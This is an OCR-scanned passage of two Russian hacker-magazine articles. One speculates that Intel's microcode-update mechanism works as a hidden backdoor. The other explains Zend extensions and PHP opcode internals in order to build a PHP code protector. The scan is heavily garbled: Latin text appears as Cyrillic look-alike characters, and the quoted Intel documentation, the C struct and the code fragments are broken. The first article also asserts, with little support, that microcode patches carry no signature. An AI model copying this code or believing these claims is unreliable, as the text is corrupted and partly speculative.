которых главными являются абстрактные 
Гигагерцы и Ядра — чем их больше, тем лучше. 
Этим знания и ограничиваются. Хотя нет, мно- 
гие еще знают, что Іпіеі лучше АМР... 



Собственно, такое вступление было 
сделано только для одного — чтобы объ- 
яснить, почему техническая документация 
по архитектуре вычислительных систем 
неинтересна основной массе программистов. 
Каков интерес, таков и уровень изложения 
материала. В последнее время техническая 
документация на процессоры, чипсеты, 
периферийные контроллеры стала фрагмен- 
тарна, во многих случаях она превратилась 
в отписки, а иногда уже встречается и пря- 
мая фальсификация (как в случае с ѵРго/ 
АМТ, например). 

С другой стороны, реальная техническая 
информация перешла в разряд конфиден- 
циальной, а кое-где и секретной информа- 
ции. Доступ к ней открыттолько избранным 
и доверенным партнерам, а для прочих за 
процедурой получения доступа зачастую 
стоит вопрос: для чего тебе это нужно? И как 
только на него дается ответ, все контакты об- 
рываются. По крайней мере, такая практика 
действует в отношении России. 
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Черные дыры под белыми пятнами 




Рідцге 9-7, Арріуіпд Місгееосіе 



Рис. 1. Схема обновления микрокода из документации Іпіеі 



Если сомневаешься, предлагаю зайти на 
официальный сайт компании Іпіеі для раз- 
работчиков. Там есть списки документов, до- 
ступных для скачивания, возле многих из них 
изображен маленький замочек. Для доступа 
к этим документам нужно пройти регистрацию. 
Попытайся зарегистрироваться, и тогда все 
тебе станет ясно. 

В России эту процедуру не смог пройти 
даже уважаемый академический Институт 
системного программирования РАН (ИСП РАН). 
А это только уровень так называемых желтых 
страниц, есть еще уровень красных страниц, 
есть и более конфиденциальные уровни... 

Сразу после такого вступления появляется 
соблазн начать говорить о недокументиро- 
ванных возможностях, бэкдорах, но статья не 
об этом. Даже в доступной документации есть 
информация, которая непостижимым образом 
проходит мимо людей, профессионально зани- 
мающихся информационной безопасностью. 

Начну издалека. У многих серьезных 
программистов случалось так, что внешне 
абсолютно корректно написанный код по непо- 
нятной причине не хочет работать. Начинают 
разбираться, выходят на конкретные цепочки 
команд и понимают, что они работают в этой 
последовательности неправильно. Такое 
в большинстве случаев (у меня, по крайней 
мере) происходит на оборудовании Іпіеі. 

Несколько раз я сам натыкался на подоб- 
ные «непрухи», но после переноса «сбойного» 
процессора на другую материнскую плату либо 
после обновления ВІ05 ситуация приходила 
в норму, все начинало работать корректно. 

Многие, наткнувшись на похожие труд- 
ности, наверняка на этом успокаивались, 
в лучшем случае переписывали сбойный 
участок кода и продолжали работать, более 
не задумываясь о причинах такого поведения 
процессора. 

Похоже, с подобной проблемой столкнулся 
и небезызвестный Крис Касперски. В 2008 



году он объявил, что обнаружил некорректное 
выполнение команд на процессорах Іпіеі, ко- 
торое приводило к появлению бэкдоров в сете- 
вом доступе к вычислительной установке. Вот 
выдержка из новостной ленты того времени: 

18.07.2008 

Касперски взломал процессоры ІітЬеІ 

«Процессоры содержат недоработку кото- 
рые позволяют использовать уязвимости как 
непосредственно сидя за компьютером, так 
и дистанционно, вне зависимости от установ- 
ленных обновлений и приложений», - говорит 
Касперски. 

На конференции Наск Іп ТЬе Вох в Малай- 
зии он планирует продемонстрировать техни- 
ки взлома при помощи кода на ЗаѵаЗсгірі, 
а также потока ТСР/ІР -пакетов. Специалист 
по безопасности пообещал открыть написан- 
ный им код для всех желающих. 

Своего обещания он, к сожалению, не 
сдержал — ни подробного рассказа, ни демон- 
страции техники взлома так и не последовало. 
По неизвестной причине автор горячей ново- 
сти на конференции не выступил. 

Я же, как и всякий русский, наступив на 



Рис. 2. Простейший пример кода, обновляющего микрокод 



эти «грабли» в третий раз, решил наконец 
разобраться с этими регулярно возникающими 
проблемами досконально. 

Немного специальной информации. То, чем 
мне пришлось заняться, называется вери- 
фикацией. Эта работа требует инженерных 
навыков и специальных знаний. Сложность ве- 
рификации в том, что современные процессо- 
ры — это конвейерные устройства, обрабаты- 
вающие несколько команд одновременно. Как 
правило, ошибки выполнения команд возни- 
кают именно в конвейерном режиме. В режиме 
выполнения единственной команды (шаговый 
режим в отладчике, к примеру) их обычно нет, 
поскольку такие очевидные ошибки вылавли- 
ваются на этапе тестирования чипов. 

Для верификации используются специаль- 
ные средства, из доступных и бесплатных есть 
только официальный эмулятор АМй «5ітІ\Іоѵѵ», 
правда, он предназначен исключительно для 
продукции АМй и верификатором его можно 
назвать только условно. Для процессоров Іпіеі 
даже таких ручных средств нет, их приходится 
каждый раз писать самому под конкретную за- 
дачу. Вообще, лучше использовать аппаратный 
отладчик, но в Россию они не поставляются. 

В результате титанических усилий я уперся 
в конкретный МБР с номером 8ВЬ, именно со- 
держимое этого регистра в моем конкретном 
случае определяло неправильное выполнение 
цепочки команд. 

МБР — это моделезависимые системные 
регистры, их в процессорах множество — 
никак не менее двух-трех сотен. Из названия 
ясно, что их функции зависят от конкретной 
модели процессора. Многие из них со време- 
нем превратились в моделенезависимые реги- 
стры, и они присутствуют во всех процессорах 
и выполняют одну и туже функцию. 

Именно к этой категории относился МБР 
под номером 8ВЬ. Он присутствует во всех без 
исключения процессорах фирмы Іпіеі и на- 
зывается «ІА32_ВІ05_5І6І\І_Ю» или, более 
понятно, «ВІ05 Іірсіаіе Бідпаіиге», а по-русски 
«Регистр обновленной сигнатуры Биос». Соб- 
ственно к Биосу этот регистр имеет косвенное 
отношение, название только запутывает. 

Оказалось, что значение в этом регистре 
определяло корректность выполнения машин- 
ных команд процессора. Полез в документацию 
почитать про этот МБР и долго матерился — 
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классический пример «силы заднего ума». Вме- 
сто того чтобы тратить время на эти исследова- 
ния, можно было просто внимательно прочитать 
документацию: несмотря на ее объем, это было 
бы быстрее и, главное, полезнее. Все написано 
в документации (ѴоІ. ЗА, глава 9.11 «Місгособе 
ирсіаіе Іасіііііез»), и все предельно логично. 

В этой главе речь идет об официальном 
механизме обновления микрокода в цен- 
тральных процессорах Іпіеі. В официальной 
документации АМй на современные про- 
цессоры упоминаний о такой возможности 
нет, но это не значит, что и самого механизма 
обновления микрокода нет. Такой механизм 
описан на официальном сайте АМй, там же 
имеются сами патчи микрокода. Механизмы 
обновления микрокода у обоих производите- 
лей практически одинаковы, различия только 
в номерах используемых для этой процедуры 
МБР и структуре патча. 

Но вернемся к продукции Іпіеі. Вот как она 
описывает этот механизм: 

9.11 МІСКОССЮЕ 11РОАТЕ РАСІІЛТІЕ5 

Тке Репііит 4, Іпіеі Хеоп } апсі Р6 / отііу 
ргосеззогз каѵе іке сараЬііііу іо соггесі 
еггаіа Ьу іоасііпд ап Іпіеі- зиррііед сіаіа 
Ыоск іпіо іке ргосеззог. Тке сіаіа Ыоск 
15 саііесі а тісгососіе ирсіаіе. Ткіз зесііоп 
сІезсгіЬез іке тескапізтз іке ВІ05 пеесіз 
іо ргоѵісіе іп огсіег іо азе ікіз / еаіиге 
сіигіпд зузіет і піііаііт.аііоп. Іі аізо 
сІезсгіЬез а зресірсаііоп ікаі регтііз іке 
іпсогрогаііоп о/ / иіиге ирсіаіез іпіо а 
зузіет ВІ05. 

Іпіеі сопзісіегз іке геіеазе о/ а 
тісгососіе ирсіаіе / ог а зііісоп геѵізіоп 
іо Ье іке едиіѵаіепі о / а ргосеззог 
зіерріпд апсі сотріеіез а / иіі-зіерріпд 
іеѵеі ѵаШаііоп / ог геіеазез о/ тісгососіе 
ирсіаіез. 

А тісгососіе ирсіаіе із изесі іо соггесі 
еггаіа іп іке ргосеззог. Тке ВI05^ мкіск 
каз ап ирсіаіе іоабег, із гезропзіЫе / ог 



іоасііпд іке ирсіаіе оп ргосеззогз сіигіпд 
зузіет іпіііаіііаііоп (Рідиге 9-7). Ткеге 
аге ііл/о зіерз іо ікіз ргосезз: іке ргзі із 
іо іпсогрогаіе іке песеззагу ирсіаіе сіаіа 
Ыоскз іпіо іке ВІ05; іке зесопсі із іо іоас/ 
ирсіаіе сіаіа Ыоскз іпіо іке ргосеззог. 

Немного теории, чтобы ввести в курс дела. 
Процессоры архитектуры х86-64 имеют сме- 
шанное программно-аппаратное управление. 
Любая команда для процессора — это набор 
микроопераций, простые команды — это одна 
микрооперация, сложные команды могут со- 
стоять из сотен, а для некоторых современных 
команд — из тысяч микроопераций. 

Это значит, что некоторые простые команды 
(типа арифметических, логических) процессор 
выполняет на комбинаторной логике за одну 
микрооперацию, фактически это аппаратное 
выполнение команды. 

Более сложные команды состоят из цепочек 
микроопераций с условными переходами, 
циклами, прерываниями. Так вот, эти цепочки 
микроопераций и являются микропрограммами 
выполнения команд процессора. Это, конечно, 
очень поверхностное и упрощенное объяснение 
механизма выполнения команд на современных 
процессорах х86-64, но, думаю, суть понятна. 

Все микропрограммы выполнения команд 
хранятся в самом процессоре, в специальной 
энергонезависимой памяти, и заливаются туда 
на этапе его изготовления. Но, как известно, 
у любого программиста на тысячу строк кода 
всегда найдется хотя бы одна ошибка, так что 
ошибки в микропрограммах бывают, и для 
оперативного их исправления используется 
механизм патчей. 

Другими словами, содержимое памяти 
микропрограмм можно подправить уже на дей- 
ствующем оборудовании. Для этого исполь- 
зуются специальные информационные блоки 
(тісгососіе ирсіаіе). Іпіеі предоставляет их всем 
производителям материнских плат, чтобы те 
включали их в собственные сборки ВІ05. 



Механизм обновления микрокода прост: 
каждый раз после подачи питания или после 
выдачи сигнала сброса (Резеі) необходимо 
загрузить патч во все процессорные ядра. 
Другими словами, текущие патчи не сохраня- 
ются в энергонезависимой памяти, и их нужно 
каждый раз перезаписывать. 

В структуре патча выделяются три части, 
расположенные последовательно. Первая 
часть («Неасіег» — размер 48 байт) и послед- 
няя (ехіепбесі зідпаіиге — размер 20 байт) 
описана в документации полностью, они пред- 
ставляют из себя набор полей идентификации 
типов процессора, для которых предназначен 
данный патч. 

Самая главная часть — тело патча 
(«йаіе» — размер не фиксирован) — не описа- 
на в документации, структура ее неизвестна. 
Именно эта часть содержит микропрограммы, 
которые замещают прошитые на этапе про- 
изводства микропрограммы процессора. Іпіеі 
не предоставляет никакой информации для 
того, чтобы узнать, хотя бы какие команды 
и режимы работы процессора подвергаются 
изменению. 

Метод загрузки патча очень прост. Для это- 
го используется единственный МБР 079И (офи- 
циальное название «ВІ05 Іірбаіе Тгіддег»), его 
можно только записывать, прочитать из него 
информацию невозможно. 

Как видно из примера (рис. 2), в документа- 
ции обновление микрокода происходит после 
записи в МБР 79Ь стартового адреса памяти, 
с которого размещен Оаіа-блок патча. Пример 
реализован для реального режима работы 
процессора (для ВІ05), но этуже операцию 
можно выполнять и в любом другом режиме 
работы процессора. 

Единственный способ узнать результат за- 
грузки патча — это прочитать текущую версию 
патча, для чего используется специальный 
МБР 8Ы~і. Если патч успешно загрузился, то 
его новый номер можно прочесть из этого 
регистра. Если регистр содержит нулевую ин- 
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Рис. 3. Пример чтения текущего номера патча (из документации), метод достаточно хитрый Рис. 4. Фото сделано до загрузки операционной системы, 

редактор собственного изготовления 
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Черные дыры под белыми пятнами 
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Рис. 5. Значение того же МБР 8Ыі # но после загрузки ОС, 
используется стандартный дамп моделенезависимых 
регистров в Сандре 



Рис. 6. Пример файла обновления микрокода 
операционной системы ѴѴіпсІоѵѵз 



Рис. 7. Регистры идентификации ТРМ-модуля на моей 
машине 



формацию, то никаких патчей не загружено. 

Как видно из примера (рис. 3), для коррект- 
ного чтения текущей версии патча требуется 
сначала обнулить МБР 8Ы~і, затем выполнить 
команду СриИ с значением ЕАХ=1, и только 
после этого, прочитав данный МБР, мы найдем 
в регистре ЕйХ номер текущего патча. 

Предполагается (так сказано в докумен- 
тации), что процедура обновления микро- 
кода производится из ВІ05, но нет никаких 
ограничений на ее проведение и во время 
последующей работы процессора. Другими 
словами, патчить микропрограмму процессора 
можно до бесконечности и во время работы 
операционной системы. Блокировок режима 
обновления микрокода в аппаратуре процес- 
сора не предусмотрено. А вот это уже некор- 
ректно и попахивает бэкдором, скрытым под 
недокументированными возможностями. 

Переводя на общепонятный язык: имеется 
возможность в любой момент подправить 
алгоритм работы любой команды процессора 
таким образом, чтобы она выполняла недоку- 
ментированную функцию. Нужно только знать 
структуру информационного блока, и тогда из 
любой процессорной команды можно будет 
сотворить совершенно иную, собственную, 
по своему вкусу и разумению. 

Посмотрим, как это реализовано «вживую», 
на конкретной вычислительной системе. Для 
этого я разработал специальный редактор, вы- 
полняющийся до загрузки ОС (рис. 4). МБР 8ЬЬ 
имеет значение 17Гі. 

Если посмотреть на МБР 8Ы~і уже после 
загрузки ОС, используя стандартный дамп 
моделенезависимых регистров в Сандре, то 
получаем другое значение (рис. 5). В регистре 
содержится ОаЗЬ. 

Видно, что значение текущего патча микро- 
кода изменилось. Что это? Ошибка в рассужде- 
ниях? Нет, конечно, просто все современные 
ОС имеют специальный модуль обновления 
прошивок микрокода центрального процессо- 
ра, и во время загрузки ОС микрокод обновля- 
ется из файла, предоставляемого Іпіеі. 

Вот пример такого файла обновления 
микрокода операционной системы ѴѴіпсІоѵѵз. 

Іпіеі регулярно распространяет офици- 
альные обновления микрокода (рис. 6), но 
описания структуры патча в этих бюллетенях 
нет, это закрытая информация. Нет даже списка 



исправленных ошибок либо добавленных опти- 
мизаций. С файлом обновления микрокода идет 
только информация об операционных системах, 
для которых он предназначен, и типов процес- 
соров, которые поддерживаются этим патчем. 

Но информация, тем более конфиденци- 
альная, все равно что вода в решете, она так 
же может утекать и растекаться, а потом ее 
уже не собрать... Утечки конфиденциальной 
информации не редкость, во многих случаях 
это даже не утечка, а налаженный рабочий 
процесс. Так что можно с уверенностью гово- 
рить о том, что не только специалисты фирмы 
Іпіеі владеют методами перепрограммиро- 
вания процессоров. Показывать пальцем на 
тех, кто кроме них располагает информацией 
о таких методах, не будем, пальцем показы- 
вать некрасиво. 

Патчи микрокода — это абсолютно белое 
пятно. Ни Іпіеі, ни производители материнских 
плат, ни производители ОС не публикуют дан- 
ные о номерах патчей и об ошибках, которые 
они закрывают. Даже МісгозоЙ, от своего 
имени выпуская патч микрокода, не говорит 
ничего о том, для чего он нужен, — только 
обтекаемая фраза о более стабильной работе. 

Еще одной проблемой становится ВІ05 
материнских плат; там имеется патч микро- 
кода для процессора, но кто гарантирует, что 
он корректен? Недобросовестное искажение 
его содержимого возможно и на этапе его 
создания в Іпіеі, и на этапе заливки в ВІ05 при 
производстве материнской платы. 

Кроме этого, патч может обновляться во 
время обновления ВІ05 материнской платы 
уже в процессе эксплуатации оборудования, да 
и просто заменить его в ВІ05 не проблема. Хоть 
какую-то гарантию давала бы цифровая под- 
пись на патче, но ее наличие не предусмотрено 
в структуре блока обновления микропрограм- 



мы. Также невозможно блокировать функцию 
обновления микрокода аппаратно, она всегда 
доступна из нулевого кольца привилегий. 

Возвращаясь к истории, связанной с об- 
наружением недокументированного поведе- 
ния процессоров Іпіеі, выявленного Крисом 
Касперски, можно предположить, что он 
столкнулся именно с багами микропрограмм. 
Были ли они умышленными, либо просто 
были банальными ошибками, неизвестно, да 
по большому счету уже и не важно. Сам этот 
уже подзабытый факт переводит, в общем-то, 
теоретические рассуждения в практическую 
сферу — такое возможно. 

Воттак и получаются черные дыры ИБ, 
скрытые под белыми пятнами в технической 
документации, которую нам скармливают фир- 
мы — производители оборудования. 

А всего-то нужно начать грамотно работать 
с производителями в рамках государствен- 
ной политики информационной безопасности 
(если она у нас имеется). 

Р.5. Материал для статьи готовился на 
машине производства НР, и, запустив сканер 
ресурсов системной шины, я обнаружил на 
ней активный ТРМ-модуль. Его регистры 
идентификации смотри на рис. 7. Этим кодам 
соответствует чип ТРМ-модуля 5І_В 96835 про- 
изводства Іп^епеоп. Насколько мне известно, 
законодательством запрещено ввозить и тем 
более использовать криптографические сред- 
ства западного производства. А эта машинка 
была произведена на питерском заводе, 
который является совместным предприятием 
НР и Рохсопп. 

Р.Р.5. Все вышесказанное — лишь мои 
собственные размышления. ІКІ 



ПАТЧИ МИКРОКОДА — ЭТО АБСОЛЮТНО 
БЕЛОЕ ПЯТНО. НИКТО НЕ ПУБЛИКУЮТ 
ДАННЫЕ О НОМЕРАХ ПАТЧЕЙ И ОБ 
ОШИБКАХ, КОТОРЫЕ ОНИ ЗАКРЫВАЮТ. 
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кодинг 



Николай «МОгІагіу» Нежинский (тогіагіуйігопі.ги] 



РАЗБИРАЕМСЯ В РАБОТЕ 
2Е№-ЭКСТЕНШЕНОВ И МУТИМ 
СВОЙ РНР-ПРОТЕКТОР 






В предыдущих статьях мы уже рассмотрели 
платинную систему движка РНР с ракурсов 
написания РНР-экстеншенов и БАРІ. Но есть 
еще и третья сторона. Сегодня будем втыкать 
в кодинг так называемых іепсі_ехІеп5Іоп5 
на примере создания протектора РНР-файлов. 
Приготовься, будет интересно, но сложно. 



адеюсь, ты прочел предыдущие мои статьи по разработке 
плагинов для РНР — информация из них очень пригодит- 
ся, чтобы разобраться в этом материале. Также рекомен- 
дую прочесть статьи «РНР-дайвинг» ( ѵѵѵѵѵѵ.хакер.ги/ро5І/56672 ) 
и «2епсІ биагсі под хакерским прицелом» ( ѵѵѵѵѵѵ.хакер.ги/тааагіпе/ 
ха/091/090/1 .азр ]. 

Как и следует из названия, гепсі-экстеншены — это вид плаги- 
нов, предназначенный для расширения движка 2епсІ. Здесь ты не 
увидишь добавления новых функций и классов для интерпретато- 
ра. Не будем, впрочем, голословными и посмотрим на структуру, 
описывающую данный вид расширений: 
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РНР-протектор 



2епсІ ѴМ 

Начальная инициализаций 




Рис. 1. Воттак работает ѴМ: сложностей — ноль! 

5~ЕгисЕ гепсі ехІіепБІоп { 



// Запуск движка 

Б-ЕагЕир -Рипс _~Е 5~ЬагЬир; 

// Останов движка 

5Ііи1:сІоып_-Рипс_1: зіпиіісіомп; 

// Начало запроса 

ас1:1уа1:е_-Рипс_Р асіііѵаііе; 

// Окончание запроса 

сіеасіііѵаііе -Рипс 1= сіеасіііѵаііе; 

// Отслеживание сообщений от движка 

тезза^е ііапсііег -рипс і: тезза^е ііапсііег ; 

// Вызывается перед выполнением второго прохода 

// компиляции, точнее в самом начале 

ор_аггау_ІіапсІ1ег_-Рипс_1: ор_агпау_ІіапсІ1еп; 

// Вызывается в обработчике опкода 2ЕШ ЕХТ 5ТМТ 
5І:а1:етеп1:_ІіапсІ1ег_-Рипс_1: 5І=а1=етеп1=_ІіапсІ1еп ; 

// Выз. в обр. 2ЕШ_ЕХТ_ГСАІ.І._ВЕ(зІМ 

-Рса11_Ье§іп_ІіапсІ1ег_-Рипс_1: -Рса11_Ье§іп_ІіапсІ1еп; 
// Выз. в обр. 2ЕШ ЕХТ РСАИ ЕШ 

-Рса11_епсІ_ІіапсІ1ег_-Рипс_і -Рса11_епсІ_ІіапсІ1еп; 

// Выз. в конце іпііі ор аггаѵ 

ор агпау сііог -Рипс 1: ор аггаѵ сііоп ; 

// Выз. в конце сіезішоу ор аггау 

ор_аггау_сІ1:ог_-Рипс_1: ор_аггау_сІ1:оп; 



}і 

За исключением информации о копирайтах и некоторых 
служебных данных, это все, что доступно разработчику. Согласен, 
не густо. Но и с этим можно жить. Правда, необходимо сделать 
несколько уточнений. 

те55аде_ЬапсІІег — сейчас в движке используется только одно 
сообщение (2ЕМО_ЕХТМ50_МЕѴѴ_ЕХТЕМ5ІОІ\І), которое уведомля- 
ет остальные 2епб_ехІеп5Іоп5 о регистрации нового их «собрата». 
Однако движок экспортирует функцию рассылки сообщений, 
и поэтому вполне реально создать два расширения, которые будут 
обмениваться сообщениями, при условии, что знают друг о друге. 

2ЕІ\Ю_АРІ ѵоісі 2 епсІ_ех1:еп5Іоп_сІІ5ра1:сІі_те5 5а§е( 
іпі: тезБа^е. ѵоісі * аг^) ; 



цией 5АРІ выставил флаг 2ЕМ0_С0МРІІ_Е_НАМ0І_Е_0Р_АПРАѴ 
в С0(сотріІег_орІіоп5). 

ор_аггау_сЙог — выполнится, только если произведен второй 
проход компиляции. А этого может и не быть, если при первом 
проходе произошла «неприятность». 

Опкоды 2ЕЫ0_ЕХТ_5ТМТ, 2ЕМ0_ЕХТ_РСАІ_І__ВЕ6ІМ и 2ЕЫ0_ 
ЕХТ_РСАІ_І__ЕМО вообще не генерируются, если в С0(сотрі1ег_ 
орііопз) НЕ присутствует флаг 2ЕМ0_С0МРІІ_Е_ЕХТЕМ0Е0_ІМР0. 
Следовательно, и соответствующие обработчики нервно курят 
в сторонке, если 5АРІ не позаботился заранее. 

ЧТО МОЖНО СДЕЛАТЬ С ТАКИМ ЭКСТЕНШЕНОМ? 

Ты удивишься, но немало. Да, по прямому назначению набор 
саІІЬаск'ов в разы проигрывает функционалу 5АРІ. Утешает одно 
— судя по всему, эти расширения никогда не предназначались 
для чего-то большего, чем работа с массивом опкодов. Итак, вот 
приблизительный список возможного применения: 

• Реализация отладчика. Обработчик 2ЕМ0_ЕХТ_5ТМТ не де- 
лает ничего полезного, кроме уведомления о своем присут- 
ствии всех 2епб_ехІеп5Іоп5. А делает он это весьма настырно, 
поскольку втискивается перед любым набором опкодов, ас- 
социированных с данным выражением, примерно так: 2ЕЫй_ 
ЕХТ_5ТМТ, 2ЕМ0_А551С1\1, 2ЕМ0_ЕХТ_5ТМТ, 2ЕЫ0_ЕСН0. То 
есть код <?рЬр $1тр=ТезТ; есЬо $Іе5І.'_]іі5І_'.$Іе5І; ?> получит 
следующий массив опкодов: 2ЕЫ0_ЕХТ_5ТМТ, 2ЕЫ0_РЕТСН_ 
СОИЗТАІМТ, 2ЕМО_А55І0І\І, 2ЕЫ0_ЕХТ_5ТМТ, 2ЕЫ0_С0МСАТ, 
2ЕМ0_С0ЫСАТ, 2ЕЫ0_ЕСН0, 2ЕЫ0_ЕХТ_5ТМТ, 2ЕМ0_РЕТІІРІ\І. 

• Профилировщик кода. Владея всеми данными, можно за- 
мерить скорость выполнения отдельных опкодов, функций, 
циклов, выражений и методов класса. 

• Акселераторы. Ну куда же без них? Каждый раз перечиты- 
вать исходник, проводить лексический анализ и насиловать 
память? Увольте. Это же сколько квантов процессора псу под 
хвост... А если на загруженном проекте? Сохранить, а потом 
восстановить и держать в памяти массив опкодов совсем не 
сложно (как мы скоро увидим). Нужно только проверить скрипт 
на изменения и, если изменился, удалить старый массив, а по- 
том повторить алгоритм действий. 

• Протекторы РНР-кода. Ими сегодня и займемся. Они с акселе- 
раторами как братья, только еще шифруют, сжимают, оптими- 
зируют и обфусцируют массив опкодов. 

Наверняка моя скудная фантазия выдала не все варианты, 
и ты замутишь что-то реально уникальное. Но это больше, чем ты 
вообразил, взглянув на структуру расширения (зуб даю. Чужой. 
Отобранный с боем у стоматолога). 

И СНОВА О ѴМ 

Если ты послушался меня и перечитал статьи (в частности «РНР- 
дайвинг»), то у тебя уже есть представление о виртуальной маши- 
не. Однако погружение было не таким глубоким, какое нужно нам, 
чтобы осуществить задуманное. Плюс необходимо исправить пару 
неточностей. 



НАЗВАНИЕ 


САЙТ 


МИН. ЦЕНА 


рМрБНІЕЮ 


Ш р ://\л/\л/ѵѵ. р Ь р 5 Ы е 1 с! . со т 


$99 


РНРРРОТЕСТОК 


Ш р ://\л/\л/ѵѵ. р Ь р р го*е сіо г. п е* 


$49.99 


Боигсе биагсііап 


ЬЦр://ѵѵѵѵѵѵ.5оигседиагсІіап.сопп 


$199 


2епсІ биагсі 


Ь и р ://ѵѵ ѵѵ ѵѵ. 2 е п сі .со т 


$600 


іопСиЬе 


НЦр://ѵѵѵѵѵѵ.іопсиЬе.сопп 


$199 


ВуІеРип 


НЦр://ѵѵѵѵ\л/.Ьу*егип.сопп 


$49 



ор_а ггау_Ьа псі Іег — вызывается, только если перед компиля- 



Рис. 2. Рынок скорее жив, чем мертв? Если нет — оживим его! 
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Рис. 3. Мало кто знает, что точкой входа РНР-файла является безымянная функция 



Сначала об исправлениях. Типы операндов (и результата) 

ТМР и ѴАР являются временными переменными (в том смысле, 
что кучкуются они вместе), а переменная, которую ты опреде- 
ляешь в коде ($ѵаг), носит тип СѴ (сотрііесі ѵагіаЫе, «реальная» 
переменная). ІЛМІІ5Е0 означает, что операнд или результат 
не используется. Чем же отличаются переменные ТМР и ѴАР? 
ТМР удаляется в обработчике опкода в любом случае, а ѴАР — 
только в том, если на эту переменную не осталось ссылок (гѵаі. 
гекоипі дс). 

Прежде чем опускаться на дно, давай повторим то, что ты 
должен знать. Сначала 5АРІ получает указатель на массив опко- 
дов 2 епсІ_ор_аггау*, используя компиляцию файла или строки. 
Затем передает этот массив во власть 2 епб_ехесиІе (указатель, 
в дефолтной среде указывает на рбрбіз.ехесиіе). Виртуальная 
машина выполняет обработчики опкодов, пока один из об- 
работчиков не вернет 2ЕМ0_ѴМ_РЕТІІРМ (или не скопытится 
в ехсерЛоп). Массив опкодов находится в 2епсІ_ор_аггау.орсосІе5 
или в 2 епб_ор_аггау.зІагІ_ор. Последний, к слову, имеет приори- 
тет. Размер массива задается в 2 епсІ_ор_аггау.зІ 2 е. Каждый опкод 
(гепсІ_ор) описывается адресом обработчика, экземплярами 
результата и двух операндов (гпосіе), ехІепсІесІ_ѵаІііе (сюда во 
время компиляции помещают дополнительные данные, которые 
учитываются в обработчике), номером строки в исходном файле 
и номером опкода. 

Структура гпосіе выглядит так: 

Ііѵресіе-Р зігисЕ _гпосІе ^ 

іп-Е ор_1=уре; 
ипіоп { 

іѵаі сопБ'Еап-Е; 



гепсіиіпі: ѵа г; 

2 епсІ_иіп 1 : ор1іпе_пит; 

2 епсі_ор_апгау *ор_аггау; 

гепгі_ор *дтр = асІсІг; 

зігисЕ { 

гепсіиіп і: ѵаг; 

гепсІиіігЕ і:уре : 

} ЕА; 

} и; 

} гпосіе; 

2 побе.ор_ 1 уре — это и есть тип операнда (С0Ы5Т, ѴАР, ТМР, СѴ, 
ШМІІ5Е0). 2 побе.и.{ѵаг, орІіпе_пит, ор_аггау, )тр_асІсІг, ЕА} ис- 



пользуются в зависимости оттипа операнда и опкода. 

Откуда же берутся эти опкоды? Разбирая поток лексем, 
движок дергает функции из 2 епб_сотріІе.с с именами 2 епб_сІо_*, 
а они, в свою очередь, получают указатель на свой 2 епб_ор* и за- 
полняют его данными для обработчика. Сами обработчики вместе 
с движком виртуальной машины и некоторыми служебными дан- 
ными (статическими переменными, макросами, определениями) 
находятся в 2 епсІ_ѵт_ехесіЛе.Ь. Надеюсь, это для тебя не станет 
шоком, но 2 епб_ѵт_ехесіЛе.Ь состоит из двух файлов, а точнее 
двух шаблонов. Первый ( 2 епб_ѵт_сІеІ : .Ь) содержит шаблоны 
обработчиков. Второй ( 2 епб_ѵт_ехесіЛе.зкІ) содержит шаблон 
функции рЬрбІз.ехесіЛе. Шаблон обработчика выглядиттак: 

2ЕШ_ѴМ_ НА МРІЕК(<0 РС0РЕ-І\ІІ)МВЕ К> . <О Р СОРЕ>. 

< ОР 1_ТѴР Е 5 > , <О Р2 ТУР Е 5 > ) 

<НАМР1ЕК , 5 СОРЕ> 

} 



Здесь <0РС00Е-1\ШМВЕР> — номер опкода, <0РССЮЕ> — имя 
опкода (например, 2ЕЫ0_А00), <0Р1_ТУРЕ5> и <0Р2_ТУРЕ5> — 
типы операндов, с которыми работает обработчик. Типы разделя- 
ются «I», например С0М5Т|ТМР|ѴАР|ІІЫІІ5Е0|СѴ. Вместо набора 
типов можно указать АЫѴ. <НАМ0І_ЕР'5 ССЮЕ> — это преимуще- 
ственно Си-код с примесью псевдокода, обрабатываемого ша- 
блонизатором. Если хочешь разобраться в этом, зазгляни внутрь 
РЕА0МЕ.2ЕЫ0_ѴМ и 2 епб_ѵт_сІеТЬ. Шаблоны можно обработать 
шаблонизатором, он лежит в папке с файлами. Выполняем: 

С : \ыыы\рІір-5 . 3 . 8\2епсІ>рІір гепсІ_ѵт_§еп . рбр 
2епсІ_ѵт_орсосІе5 . б §епега1:есІ зиссеззТиІІу . 

2 епсІ_ ѵт_е хеси 1 :е . Іі §епега1:есІ зиссезз-РиІІу . 

и получаем файл со списком опкодов и готовый движок вир- 
туальной машины. Шаблонизатор создаст кучу обработчиков 
для разных ситуаций с именами вида <0РССЮЕ>_5РЕС[_<0Р1_ 
ТѴРЕ5>][_<0Р2_ТѴРЕ5>]_НАМ0І_ЕР количеством = количество 
<0 Р 1 ТУ РЕ5> * количество <0Р2_ТѴРЕ5>. Если один из операн- 
дов в шаблоне имеет тип АІМѴ, то дополнительные обработчики 
не генерируются, а имя обработчика принимает вид <0РССЮЕ>_ 
5РЕС_<0Р_ТУРЕ5>_НАМ0І_ЕР. 



О ПРОТЕКТОРАХ 

Не секрет, что РНР-протекторы предназначены для двух целей: 
защиты исходного кода и использования защитных механизмов, 
таких как ограничение по времени запуска, привязка к домену 
и тому подобное. Ожидаемым эффектом от первого (если протек- 
тор спроектирован правильно) является еще один положитель- 
ный момент — возрастает скорость выполнения, за счет исключе- 
ния стадии компиляции. Можно, конечно, использовать «хитрые» 
манипуляции с вариациями: 

<?р!ір 

//есііо "•Еез'Е"; 

еѵа1(Ьазе64 сІесосІе( ' 2ШоЬѵАісІ(зѴ2СІСІ7 ' ) ) ; 

?> 



Но так поступают только те, кто лишь на словах заботится о за- 
щите своего кода. Кстати, посмотри на рис. 2, если вдруг задашь 
себе вопрос «А нафига мне это нужно?». На рынке протекторы 
стоят не меньше 50 долларов, и это в самой урезанной комплек- 
тации. 



ПРИНЦИПЫ РАБОТЫ 

Любой протектор состоит из двух частей: кодировщика (епсобег'а) 
и РНР-модуля 2епб_ехІеп5Іоп. Кодировщик любым способом 
получает массив опкодов, а затем сохраняет его (и все, что с ним 
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связано) в РНР-файл, возможно устанавливая что-то вроде 
заглушки (как у файлов, закодированных 2епсІ Епсосіег). Легче 
всего это сделать так: прикинувшись 5АРІ- модул ем, выполнить 
компиляцию файла. Хотя код компиляции можно тиснуть из акту- 
альных исходников РНР, избавившись таким образом от необхо- 
димости таскать вместе с епсобег'ом рбрбіз.сііі, 2епб_ехІеп5Іоп 
при загрузке выполняет хук функций 2 епб_ехесиІе (возможно) 
